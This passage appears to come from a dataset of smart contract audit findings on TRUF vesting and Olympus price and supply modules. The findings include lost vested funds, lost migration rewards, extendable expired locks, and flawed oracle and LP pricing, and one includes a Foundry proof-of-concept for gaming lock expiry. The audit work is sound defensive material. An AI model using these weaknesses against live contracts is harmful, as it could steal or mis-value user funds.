userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n\\nFirst, consider the following code:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n}\\n```\\n\\nFirst the locked / staked funds will essentially be un-staked. 
The following line of code: `userVesting.locked = 0;` exists because there is a call to `uint256 claimableAmount = claimable(categoryId, vestingId, user);` afterwards, and in the event that there were locked funds that were unstaked, these funds should now potentially be `claimable` if they are vested (but if locked is not set to 0, then the vested funds will potentially not be deemed `claimable` by the `claimable` function).\\nHowever, because `userVesting` is `memory` rather than `storage`, this doesn't end up happening (so `userVesting.locked = 0;` is actually a bug). This means that if a user is currently staking all their funds (so all their funds are locked), and `cancelVesting` is called, then they will not receive any funds back even if `giveUnclaimed = true`. This is because the `claimable` function (which will access the unaltered userVestings[categoryId][vestingId][user]) will still think that all the funds are currently locked, even though they are not as they have been forcibly unstaked.",Change `userVesting.locked = 0;` to `userVestings[categoryId][vestingId][user].locked = 0;`,"When `cancelVesting` is called, a user may not receive their unclaimed, vested funds.","```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = 
claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n" +When migrating the owner users will lose their rewards,medium,"When a user migrates the owner due to a lost private key, the rewards belonging to the previous owner remain recorded in their account and cannot be claimed, resulting in the loss of user rewards.\\nAccording to the documentation, `migrateUser()` is used when a user loses their private key to migrate the old vesting owner to a new owner.\\n```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n\\nIn this function, the protocol calls `migrateVestingLock()` to obtain a new ID.\\n```\\n if (lockupId != 0) {\\n newLockupId = veTRUF.migrateVestingLock(prevUser, newUser, lockupId - 1) + 1;\\n lockupIds[categoryId][vestingId][newUser] = newLockupId;\\n delete lockupIds[categoryId][vestingId][prevUser];\\n\\n newVesting.locked = prevVesting.locked;\\n }\\n```\\n\\nHowever, in the `migrateVestingLock()` function, the protocol calls `stakingRewards.withdraw()` to withdraw the user's stake, burning points. 
In the `withdraw()` function, the protocol first calls `updateReward()` to update the user's rewards and records them in the user's account.\\n```\\n function withdraw(address user, uint256 amount) public updateReward(user) onlyOperator {\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n _totalSupply -= amount;\\n _balances[user] -= amount;\\n emit Withdrawn(user, amount);\\n }\\n```\\n\\nHowever, `stakingRewards.withdraw()` is called with the old owner as a parameter, meaning that the rewards will be updated on the old account.\\n```\\n uint256 points = oldLockup.points;\\n stakingRewards.withdraw(oldUser, points);\\n _burn(oldUser, points);\\n```\\n\\nAs mentioned earlier, the old owner has lost their private key and cannot claim the rewards, resulting in the loss of these rewards.","When migrating the owner, the rewards belonging to the previous owner should be transferred to the new owner.",The user's rewards are lost,```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n +Ended locks can be extended,medium,"When a lock period ends, it can be extended. If the new extension 'end' is earlier than the current block.timestamp, the user will have a lock that can be unstaked at any time.""\\nWhen the lock period ends, the owner of the expired lock can extend it to set a new lock end that is earlier than the current block.timestamp. 
By doing so, the lock owner can create a lock that is unstakeable at any time.\\nThis is doable because there are no checks in the extendLock function that checks whether the lock is already ended or not.\\nPoC:\\n```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n",Do not let extension of locks that are already ended.,"The owner of the lock will achieve points that he can unlock anytime. This is clearly a gaming of the system and shouldn't be acceptable behaviour. A locker having a ""lock"" that can be unstaked anytime will be unfair for the other lockers. 
Considering this, I'll label this as high.","```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, ""lock is ended"");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n" +OlympusPrice.v2.sol#storePrice: The moving average prices are used recursively for the calculation of the moving average price.,high,"The moving average prices should be calculated by only oracle feed prices. But now, they are calculated by not only oracle feed prices but also moving average price recursively.\\nThat is, the `storePrice` function uses the current price obtained from the `_getCurrentPrice` function to update the moving average price. 
However, in the case of `asset.useMovingAverage = true`, the `_getCurrentPrice` function computes the current price using the moving average price.\\nThus, the moving average prices are used recursively to calculate moving average price, so the current prices will be obtained incorrectly.\\n`OlympusPrice.v2.sol#storePrice` function is the following.\\n```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n\\n`L319` obtain the current price for the asset by calling the `_getCurrentPrice` function and use it to update `asset.cumulativeObs` in `L331`. The `_getCurrentPrice` function is the following.\\n```\\n function _getCurrentPrice(address asset_) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = asset.useMovingAverage\\n ? 
new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nAs can be seen, when `asset.useMovingAverage = true`, the `_getCurrentPrice` calculates the current `price` `price` using the moving average `price` obtained by `asset.cumulativeObs / asset.numObservations` in `L160`.\\nSo the `price` value in `L331` is obtained from not only oracle 
feed prices but also moving average `price`. Then, `storePrice` calculates the cumulative observations asset.cumulativeObs = asset.cumulativeObs + `price` - oldestPrice using the `price` which is obtained incorrectly above.\\nThus, the moving average prices are used recursively for the calculation of the moving average price.","When updating the current price and cumulative observations in the `storePrice` function, it should use the oracle price feeds and not include the moving average prices. So, instead of using the `asset.useMovingAverage` state variable in the `_getCurrentPrice` function, we can add a `useMovingAverage` parameter as the following.\\n```\\n function _getCurrentPrice(address asset_, bool useMovingAverage) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = useMovingAverage\\n ? 
new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nThen we should set `useMovingAverage = false` to call `_getCurrentPrice` function only in the `storePrice` function. 
In other cases, we should set `useMovingAverage = asset.useMovingAverage` to call `_getCurrentPrice` function.","Now the moving average prices are used recursively for the calculation of the moving average price. Then, the moving average prices become more smoothed than the intention of the administrator. That is, even when the actual price fluctuations are large, the price fluctuations of `_getCurrentPrice` function will become too small.\\nMoreover, even though all of the oracle price feeds fails, the moving averge prices will be calculated only by moving average prices.\\nThus the current prices will become incorrect. If `_getCurrentPrice` function value is miscalculated, it will cause fatal damage to the protocol.","```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n" +Incorrect ProtocolOwnedLiquidityOhm calculation due to inclusion of other user's reserves,high,"ProtocolOwnedLiquidityOhm for Bunni can include the liquidity deposited by other users which is not protocol owned\\nThe protocol owned liquidity in Bunni is calculated as the sum of reserves of all the BunniTokens\\n```\\n function 
getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n\\nThe deposit function of Bunni allows any user to add liquidity to a token. Hence the returned reserve will contain amounts other than the reserves that actually belong to the protocol\\n```\\n // @audit callable by any user\\n function deposit(\\n DepositParams calldata params\\n )\\n external\\n payable\\n virtual\\n override\\n checkDeadline(params.deadline)\\n returns (uint256 shares, uint128 addedLiquidity, uint256 amount0, uint256 amount1)\\n {\\n }\\n```\\n",Guard the deposit function in BunniHub or compute the liquidity using shares belonging to the protocol,Incorrect assumption of the protocol owned liquidity and hence the supply. 
An attacker can inflate the liquidity reserves The wider system relies on the supply calculation to be correct in order to perform actions of economical impact,"```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n" +Incorrect StablePool BPT price calculation,high,"Incorrect StablePool BPT price calculation as rate's are not considered\\nThe price of a stable pool BPT is computed as:\\nminimum price among the pool tokens obtained via feeds * return value of `getRate()`\\nThis method is used referring to an old documentation of Balancer\\n```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n 
* pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n\\nThe `getRate()` function returns the exchange `rate` of a BPT to the underlying base asset of the pool which can be different from the minimum market priced asset for pools with `rateProviders`. To consider this, the price obtained from feeds must be divided by the `rate` provided by `rateProviders` before choosing the minimum as mentioned in the previous version of Balancer's documentation.\\n1. Get market price for each constituent token\\nGet market price of wstETH and WETH in terms of USD, using chainlink oracles.\\n2. Get RateProvider price for each constituent token\\nSince wstETH - WETH pool is a MetaStablePool and not a ComposableStablePool, it does not have `getTokenRate()` function. Therefore, it`s needed to get the RateProvider price manually for wstETH, using the rate providers of the pool. The rate provider will return the wstETH token in terms of stETH.\\nNote that WETH does not have a rate provider for this pool. In that case, assume a value of `1e18` (it means, market price of WETH won't be divided by any value, and it's used purely in the minPrice formula).\\n3. Get minimum price\\n$$ minPrice = min({P_{M_{wstETH}} \\over P_{RP_{wstETH}}}, P_{M_{WETH}}) $$\\n4. 
Calculates the BPT price\\n$$ P_{BPT_{wstETH-WETH}} = minPrice * rate_{pool_{wstETH-WETH}} $$\\nwhere `rate_pool_wstETH-WETH` is `pool.getRate()` of wstETH-WETH pool.\\nExample\\nAt block 18821323: cbeth : 2317.48812 wstEth : 2526.84 pool total supply : 0.273259897168240633 getRate() : 1.022627523581711856 wstRateprovider rate : 1.150725009180224306 cbEthRateProvider rate : 1.058783029570983377 wstEth balance : 0.133842314907166538 cbeth balance : 0.119822100236557012 tvl : (0.133842314907166538 * 2526.84 + 0.119822100236557012 * 2317.48812) == 615.884408812\\naccording to current implementation: bpt price = 2317.48812 * 1.022627523581711856 == 2369.927137086 calculated tvl = bpt price * total supply = 647.606045776\\ncorrect calculation: rate_provided_adjusted_cbeth = (2317.48812 / 1.058783029570983377) == 2188.822502132 rate_provided_adjusted_wsteth = (2526.84 / 1.150725009180224306) == 2195.867804942 bpt price = 2188.822502132 * 1.022627523581711856 == 2238.350134915 calculated tvl = bpt price * total supply = (2238.350134915 * 0.273259897168240633) == 611.651327693","For pools having rate providers, divide prices by rate before choosing the minimum",Incorrect calculation of bpt price. 
Has possibility to be over and under valued.,"```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. 
This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n" +Inconsistency in BunniToken Price Calculation,medium,"The deviation check (_validateReserves()) from BunniPrice.sol considers both position reserves and uncollected fees when validating the deviation with TWAP, while the final price calculation (_getTotalValue()) only accounts for position reserves, excluding uncollected fees.\\nThe same is applied to BunniSupply.sol where `getProtocolOwnedLiquidityOhm()` validates reserves + fee deviation from TWAP and then returns only Ohm reserves using `lens_.getReserves(key_)`\\nNote that `BunniSupply.sol#getProtocolOwnedLiquidityReserves()` validates deviation using reserves+fees with TWAP and then return reserves+fees in a good way without discrepancy.\\nBut this could lead to a misalignment between the deviation check and actual price computation.\\nDeviation Check : `_validateReserves` Function:\\n```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n 
twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n\\nYou can see that the deviation check includes uncollected fees in the `reservesTokenRatio`, potentially leading to a higher or more volatile ratio compared to the historical `twapTokenRatio`.\\nFinal Price Calculation in `BunniPrice.sol#_getTotalValue()` :\\n```\\n function _getTotalValue(\\n BunniToken token_,\\n 
BunniLens lens_,\\n uint8 outputDecimals_\\n ) internal view returns (uint256) {\\n (address token0, uint256 reserve0, address token1, uint256 reserve1) = _getBunniReserves(\\n token_,\\n lens_,\\n outputDecimals_\\n );\\n uint256 outputScale = 10 ** outputDecimals_;\\n\\n // Determine the value of each reserve token in USD\\n uint256 totalValue;\\n totalValue += _PRICE().getPrice(token0).mulDiv(reserve0, outputScale);\\n totalValue += _PRICE().getPrice(token1).mulDiv(reserve1, outputScale);\\n\\n return totalValue;\\n }\\n```\\n\\nYou can see that this function (_getTotalValue()) excludes uncollected fees in the final valuation, potentially overestimating the total value within the deviation check process, meaning the check could pass in certain conditions whereas it could not have passed if fees were not accounted on the deviation check. Moreover, the below formula is used:\\n$$ price_{LP} = {reserve_0 \\times price_0 + reserve_1 \\times price_1} $$\\nwhere $reserve_i$ is token $i$ reserve amount, $price_i$ is the price of token $i$\\nIn short, it is calculated by getting all underlying balances, multiplying those by their market prices\\nHowever, this approach of directly computing the price of LP tokens via spot reserves is well-known to be vulnerable to manipulation, even if TWAP Deviation is checked, the above summary proved that this method is not 100% bulletproof as there is a discrepancy in what is measured. 
Taking into account that the process to check deviation is not that good, plus the fact that the methodology used to compute price is bad, the impact of this is high\\nThe same can be found in BunniSupply.sol `getProtocolOwnedLiquidityReserves()` :\\n```\\n function getProtocolOwnedLiquidityReserves()\\n external\\n view\\n override\\n returns (SPPLYv1.Reserves[] memory)\\n {\\n // Iterate through tokens and total up the reserves of each pool\\n uint256 len = bunniTokens.length;\\n SPPLYv1.Reserves[] memory reserves = new SPPLYv1.Reserves[](len);\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniToken token = tokenData.token;\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(token);\\n (\\n address token0,\\n address token1,\\n uint256 reserve0,\\n uint256 reserve1\\n ) = _getReservesWithFees(key, lens);\\n\\n // Validate reserves\\n _validateReserves(\\n key,\\n lens,\\n tokenData.twapMaxDeviationBps,\\n tokenData.twapObservationWindow\\n );\\n\\n address[] memory underlyingTokens = new address[](2);\\n underlyingTokens[0] = token0;\\n underlyingTokens[1] = token1;\\n uint256[] memory underlyingReserves = new uint256[](2);\\n underlyingReserves[0] = reserve0;\\n underlyingReserves[1] = reserve1;\\n\\n reserves[i] = SPPLYv1.Reserves({\\n source: address(token),\\n tokens: underlyingTokens,\\n balances: underlyingReserves\\n });\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n return reserves;\\n }\\n```\\n\\nWhere the returned value does not account for uncollected fees whereas the deviation check was accounting for it
This could involve either including the uncollected fees in both calculations or excluding them in both.\\nIt's ok for BunniSupply as there are 2 functions handling both reserves and reserves+fees but change deviation check process on the second one to include only reserves when checking deviation twap ratio,"`_getTotalValue()` from BunniPrice.sol and `getProtocolOwnedLiquidityReserves()` from BunniSupply.sol have both ratio computation that includes uncollected fees to compare with TWAP ratio, potentially overestimating the total value compared to what these functions are aim to, which is returning only the reserves or LP Prices by only taking into account the reserves of the pool. Meaning the check could pass in certain conditions where fees are included in the ratio computation and the deviation check process whereas the deviation check should not have pass without the fees accounted.","```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees 
